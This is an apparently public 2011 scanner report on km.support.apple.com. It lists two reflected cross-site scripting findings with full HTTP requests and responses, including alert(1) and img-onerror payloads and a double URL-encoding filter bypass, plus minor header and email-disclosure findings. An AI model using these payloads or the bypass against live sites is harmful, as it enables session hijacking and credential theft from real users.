XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, km.support.apple.com

Report generated by XSS.CX at Wed Jul 20 05:30:37 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. http://km.support.apple.com/kb/index [callback parameter]

1.2. http://km.support.apple.com/kb/index [doctype parameter]

2. Email addresses disclosed

3. Content type incorrectly stated

3.1. http://km.support.apple.com/favicon.ico

3.2. http://km.support.apple.com/kb/index

3.3. http://km.support.apple.com/kb/resources/js/ACShortcuts.js



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://km.support.apple.com/kb/index [callback parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km.support.apple.com
Path:   /kb/index

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 26835%253cscript%253ealert%25281%2529%253c%252fscript%253e6f5bf200a3d was submitted in the callback parameter. This input was echoed as 26835<script>alert(1)</script>6f5bf200a3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the callback request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /kb/index?page=suggest&q=xss&locale=en_US&callback=SearchShortcut.loadJson26835%253cscript%253ealert%25281%2529%253c%252fscript%253e6f5bf200a3d HTTP/1.1
Host: km.support.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310691733323'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dsafari%26vn%3D1%3Bch%3Ddeveloper%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; ccl=xR6Evt9zR2G9A/Km9/5QzfltTjm+CDu1yhd7GPCvuRD7uv0wKKBZAj2cefeRsMVuBasmHCZsNuvX1M0CJe2rQ1YN8hplbToukEiqpVTLyy71PqhQJCeFTsmkxQUqDnqzn/01xTr4VQ1gjbVXGOtdlJJRXy/lo3T0WpyKywL5jDM0Ea7dTleEb2N612sIYQ/as7zK3kQEfvWhtK7RPPUl1iquiXHmnaHSRu9ZcIF5DMRf4/cjLuPUDMloMwuytTLHXpSp47XalzPbmnr9jaberT/vyTB7w+yGsoSpRDPPZLTKOGX7rFEk5YYP2W0XkNTLfnIVBea9q7JZv6edXOBnHNX1DQdE5M5lI0G+qicwl/764NNa1BNdrIpr7tu9xE47LMRY98yrWWkA2FdojGr6/kwVkGI36AabpZGY7V9mz+FVdQR6VwQiOpNAMtM9sEgF5tTxzbWJMGf1mP4ImVlVCg9Db6hoqWWJMOpMr+PKtWTSEHBKH8PC29eHVPVsXPDIK+7cDTqiIhEYYP8wu42NU/frYy3A359Z+cz2rasAawM6fRozJdQLIcd9f+woXNfV; geo=US; s_cc=true; dfa_cookie=appleglobal%2Capplesupport; s_pv=acs%3A%3Aweb%3A%3Ahomepage%20(us); s_ppv=acs%253A%253Aweb%253A%253Ahomepage%2520%2528US%2529%2C67%2C67%2C707%2C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%20Not%20Detected%7C; s_v35=www.fakereferrerdominator.com; s_pathLength=support%3D4%2C; s_invisit_us=support%3Dtrue%3B; s_sq=%5B%5BB%5D%5D; s_orientationHeight=707; ac_history=%7B%22search%22%3A%5B%5B%22xss%22%2C%22en_US%22%2C1310692813000%5D%5D%2C%22kb%22%3A%5B%5D%2C%22help%22%3A%5B%5D%2C%22psp%22%3A%5B%5D%2C%22offer_reason%22%3A%7B%7D%2C%22total_count%22%3A%7B%22searches%22%3A1%2C%22last_search%22%3A1310692813000%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache/1.3.33 (Darwin) mod_ssl/2.8.24 OpenSSL/0.9.7i PHP/5.2.4 DAV/1.0.3 mod_jk/1.2.28
Content-Length: 109
Content-Type: text/javascript;charset=UTF-8
Date: Fri, 15 Jul 2011 01:21:44 GMT
Connection: close


SearchShortcut.loadJson26835<script>alert(1)</script>6f5bf200a3d({"SUGGESTED_SEARCH":{},"QUICK_LINKS":{}})

1.2. http://km.support.apple.com/kb/index [doctype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km.support.apple.com
Path:   /kb/index

Issue detail

The value of the doctype request parameter is copied into the HTML document as plain text between tags. The payload 52c33<img%20src%3da%20onerror%3dalert(1)>b1643396ef8 was submitted in the doctype parameter. This input was echoed as 52c33<img src=a onerror=alert(1)>b1643396ef8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /kb/index?page=products&locale=en_US&doctype=52c33<img%20src%3da%20onerror%3dalert(1)>b1643396ef8&callback=ACSearch.receiveGenericProducts HTTP/1.1
Host: km.support.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://support.apple.com/kb/index?page=search&src=support_site.home.search&locale=en_US&q=xss
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310691733323'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dsafari%26vn%3D1%3Bch%3Ddeveloper%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; ccl=xR6Evt9zR2G9A/Km9/5QzfltTjm+CDu1yhd7GPCvuRD7uv0wKKBZAj2cefeRsMVuBasmHCZsNuvX1M0CJe2rQ1YN8hplbToukEiqpVTLyy71PqhQJCeFTsmkxQUqDnqzn/01xTr4VQ1gjbVXGOtdlJJRXy/lo3T0WpyKywL5jDM0Ea7dTleEb2N612sIYQ/as7zK3kQEfvWhtK7RPPUl1iquiXHmnaHSRu9ZcIF5DMRf4/cjLuPUDMloMwuytTLHXpSp47XalzPbmnr9jaberT/vyTB7w+yGsoSpRDPPZLTKOGX7rFEk5YYP2W0XkNTLfnIVBea9q7JZv6edXOBnHNX1DQdE5M5lI0G+qicwl/764NNa1BNdrIpr7tu9xE47LMRY98yrWWkA2FdojGr6/kwVkGI36AabpZGY7V9mz+FVdQR6VwQiOpNAMtM9sEgF5tTxzbWJMGf1mP4ImVlVCg9Db6hoqWWJMOpMr+PKtWTSEHBKH8PC29eHVPVsXPDIK+7cDTqiIhEYYP8wu42NU/frYy3A359Z+cz2rasAawM6fRozJdQLIcd9f+woXNfV; geo=US; s_cc=true; dfa_cookie=appleglobal%2Capplesupport; s_pv=acs%3A%3Akb%3A%3Asearch%20results%20(us-en); s_ppv=acs%253A%253Akb%253A%253Asearch%2520results%2520%2528us-en%2529; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%20Not%20Detected%7C; s_v35=www.fakereferrerdominator.com; s_pathLength=support%3D3%2C; s_invisit_us=support%3Dtrue%3B; s_sq=%5B%5BB%5D%5D; s_orientationHeight=707; ac_history=%7B%22search%22%3A%5B%5D%2C%22kb%22%3A%5B%5D%2C%22help%22%3A%5B%5D%2C%22psp%22%3A%5B%5D%2C%22offer_reason%22%3A%7B%7D%2C%22total_count%22%3A%7B%7D%7D

Response

HTTP/1.1 500 Internal Server Error
Server: Apache/1.3.33 (Darwin) mod_ssl/2.8.24 OpenSSL/0.9.7i PHP/5.2.4 DAV/1.0.3 mod_jk/1.2.28
Content-Length: 181
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=600
Expires: Fri, 15 Jul 2011 01:30:24 GMT
Date: Fri, 15 Jul 2011 01:20:24 GMT
Connection: close


ACSearch.receiveGenericProducts(
   
   { "name":"PRODUCTBROWSER.BROWSE_52c33<img src=a onerror=alert(1)>b1643396ef8", "id": "MAIN_PRODUCTS"
   

       ,
       "products" : [
]


   }
   );

2. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://km.support.apple.com
Path:   /kb/resources/js/ACForm.js

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /kb/resources/js/ACForm.js HTTP/1.1
Host: km.support.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://support.apple.com/kb/HT1318
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310648886450'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D3%3Bch%3Dsafari%26vn%3D1%3Bch%3Ddeveloper%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1

Response

HTTP/1.1 200 OK
Server: Apache/1.3.33 (Darwin) mod_ssl/2.8.24 OpenSSL/0.9.7l PHP/5.2.4 DAV/1.0.3 mod_jk/1.2.28
ETag: W/"6964-1305531782000"
Last-Modified: Mon, 16 May 2011 07:43:02 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Length: 6964
Date: Thu, 14 Jul 2011 15:56:26 GMT
Connection: close

var ACForm = {

   validateEmail : function(value) {
       if (/^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$/.test(value)){
           return true;
       }
       return "Invalid e-mail address! Example: webmaster@apple.co
...[SNIP]...
('dynamicform-outer-div') , {duration: .2} );
   }
   
}


/*
Event.observe(window, 'load', function() {
   ACForm.validateTest("validateSerialNumber", "71729AJSWH8");
   ACForm.validateTest("validateEmail", "example@vikingstad.com");
   ACForm.validateTest("validateAllNumeric", "123132");
   ACForm.validateTest("validateNonNumeric", "adasdsas");
   ACForm.validateTest("validateAlphaNumeric", "example");
   ACForm.validateTest("validate
...[SNIP]...

3. Content type incorrectly stated  previous
There are 3 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


3.1. http://km.support.apple.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://km.support.apple.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: km.support.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310691733323'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dsafari%26vn%3D1%3Bch%3Ddeveloper%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; ccl=xR6Evt9zR2G9A/Km9/5QzfltTjm+CDu1yhd7GPCvuRD7uv0wKKBZAj2cefeRsMVuBasmHCZsNuvX1M0CJe2rQ1YN8hplbToukEiqpVTLyy71PqhQJCeFTsmkxQUqDnqzn/01xTr4VQ1gjbVXGOtdlJJRXy/lo3T0WpyKywL5jDM0Ea7dTleEb2N612sIYQ/as7zK3kQEfvWhtK7RPPUl1iquiXHmnaHSRu9ZcIF5DMRf4/cjLuPUDMloMwuytTLHXpSp47XalzPbmnr9jaberT/vyTB7w+yGsoSpRDPPZLTKOGX7rFEk5YYP2W0XkNTLfnIVBea9q7JZv6edXOBnHNX1DQdE5M5lI0G+qicwl/764NNa1BNdrIpr7tu9xE47LMRY98yrWWkA2FdojGr6/kwVkGI36AabpZGY7V9mz+FVdQR6VwQiOpNAMtM9sEgF5tTxzbWJMGf1mP4ImVlVCg9Db6hoqWWJMOpMr+PKtWTSEHBKH8PC29eHVPVsXPDIK+7cDTqiIhEYYP8wu42NU/frYy3A359Z+cz2rasAawM6fRozJdQLIcd9f+woXNfV; geo=US; s_cc=true; dfa_cookie=appleglobal%2Capplesupport; s_pv=acs%3A%3Akb%3A%3Asearch%20results%20(us-en); s_ppv=acs%253A%253Akb%253A%253Asearch%2520results%2520%2528us-en%2529%2C63%2C63%2C707%2C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%20Not%20Detected%7C; s_v35=www.fakereferrerdominator.com; s_pathLength=support%3D3%2C; s_invisit_us=support%3Dtrue%3B; s_sq=%5B%5BB%5D%5D; s_orientationHeight=707; ac_history=%7B%22search%22%3A%5B%5B%22xss%22%2C%22en_US%22%2C1310692813000%5D%5D%2C%22kb%22%3A%5B%5D%2C%22help%22%3A%5B%5D%2C%22psp%22%3A%5B%5D%2C%22offer_reason%22%3A%7B%7D%2C%22total_count%22%3A%7B%22searches%22%3A1%2C%22last_search%22%3A1310692813000%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Oracle)
Last-Modified: Thu, 12 May 2011 04:17:48 GMT
ETag: "62d29b-1e66-4a30c78c5b300"
Accept-Ranges: bytes
Content-Length: 7782
nnCoection: close
Content-Type: text/plain
X-Pad: avoid browser bug
Date: Fri, 15 Jul 2011 01:21:03 GMT
Connection: close

..............h...F...........h....... ...........    .. ..............(....... ...........@.............................................................................................................
...[SNIP]...

3.2. http://km.support.apple.com/kb/index  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://km.support.apple.com
Path:   /kb/index

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /kb/index?page=offer&productid=PL139,PP23&origin=HOWTO_ARTICLES&locale=en_US&callback=ACUtil.showOffers HTTP/1.1
Host: km.support.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://support.apple.com/kb/HT1318
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310658988710'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dsafari%26vn%3D1%3Bch%3Ddeveloper%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; ccl=/K7KLlatFokCvhT3oIjqcJN17+gycp+TMcC7Lhd8pHDztVGIz0RaBQangaOsS7zXpxnkNXMibodnEd4AydHGlwlKYazu3PLqZuhcVTqYgDUIkp46reTtPZFKUCvOrY0g+azhu4xHrQdkIxIwf26+D7va/A7U2wb6tJJBj5shCPqiKSw8Q96ID8zskFbYB5G86/7sJxE3PfWTg6pNs1HbHnrMrE59eoQbxiCDMOnX5FnYwFUXWGab2zlw0LvrPMDyXLnGLJq35sjJ0mtikhc0MwhLHxe8fWjXM2t9YUeju7EtaLwYf1GP4ObsW3jfbyfJFHpHc0Pzw6pRE1SssxyaUvgItRJd4GzvB7Bz9hDGvEFsDLSso36PQswUPkH/AQViFE8IANDx3T52/c7vxttBa/+HjSbL/AN0jOSZr/xgIqjB0/tKRb9TLt6uHdjyfW2mGr+7wdLViflyvgl8FmOy9kvmgXdfGhvljzFJHRmoC6KH0NS6okNOqOC7mcuW1N1EA8+uPUgGMKg2mzIz7A5M2X0eRSR3FfOkKSqU7e/Xdxw3/+PdIhA8Vy21vwukODOx; geo=US; ac_history=%7B%22search%22%3A%5B%5D%2C%22kb%22%3A%5B%5B%22HT1318%22%2C%22Apple%20Web%20Server%20notifications%22%2C%22en_US%22%2C1310658991000%2C%22unknown%22%5D%5D%2C%22help%22%3A%5B%5D%2C%22psp%22%3A%5B%5D%2C%22offer_reason%22%3A%7B%7D%2C%22total_count%22%3A%7B%22kbs%22%3A1%2C%22last_kb%22%3A1310658991000%7D%7D; s_cc=true; dfa_cookie=appleglobal%2Capplesupport; s_pv=acs%3A%3Akb%3A%3AHT%3A%3AHT1318%3A%3AMac%20OS%20X%20Server%3A%3AApple%20Web%20Server%20notifications%20(us-en); s_orientation=%5B%5BB%5D%5D; s_ria=Flash%20Not%20Detected%7C; s_v35=www.fakereferrerdominator.com; s_pathLength=support%3D1%2C; s_invisit_us=support%3Dtrue%3B; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/1.3.33 (Darwin) mod_ssl/2.8.24 OpenSSL/0.9.7i PHP/5.2.4 DAV/1.0.3 mod_jk/1.2.28
Content-Length: 27
Content-Type: text/javascript;charset=UTF-8
Date: Thu, 14 Jul 2011 15:56:31 GMT
Connection: close


ACUtil.showOffers();

3.3. http://km.support.apple.com/kb/resources/js/ACShortcuts.js  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://km.support.apple.com
Path:   /kb/resources/js/ACShortcuts.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /kb/resources/js/ACShortcuts.js HTTP/1.1
Host: km.support.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://support.apple.com/kb/HT1318
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310648886450'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D3%3Bch%3Dsafari%26vn%3D1%3Bch%3Ddeveloper%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1

Response

HTTP/1.1 200 OK
Server: Apache/1.3.33 (Darwin) mod_ssl/2.8.24 OpenSSL/0.9.7l PHP/5.2.4 DAV/1.0.3 mod_jk/1.2.28
ETag: W/"57923-1306076072000"
Last-Modified: Sun, 22 May 2011 14:54:32 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Length: 57923
Date: Thu, 14 Jul 2011 15:56:26 GMT
Connection: close

// = AC =
// Apple core helper functions:
if (typeof(AC) == 'undefined') { AC = {}; }

// == HTML5 <nav> ==
// Add the HTML5 nav element for future proof-ness.
document.createElement('nav');

// == {{
...[SNIP]...

Report generated by XSS.CX at Wed Jul 20 05:30:37 CDT 2011.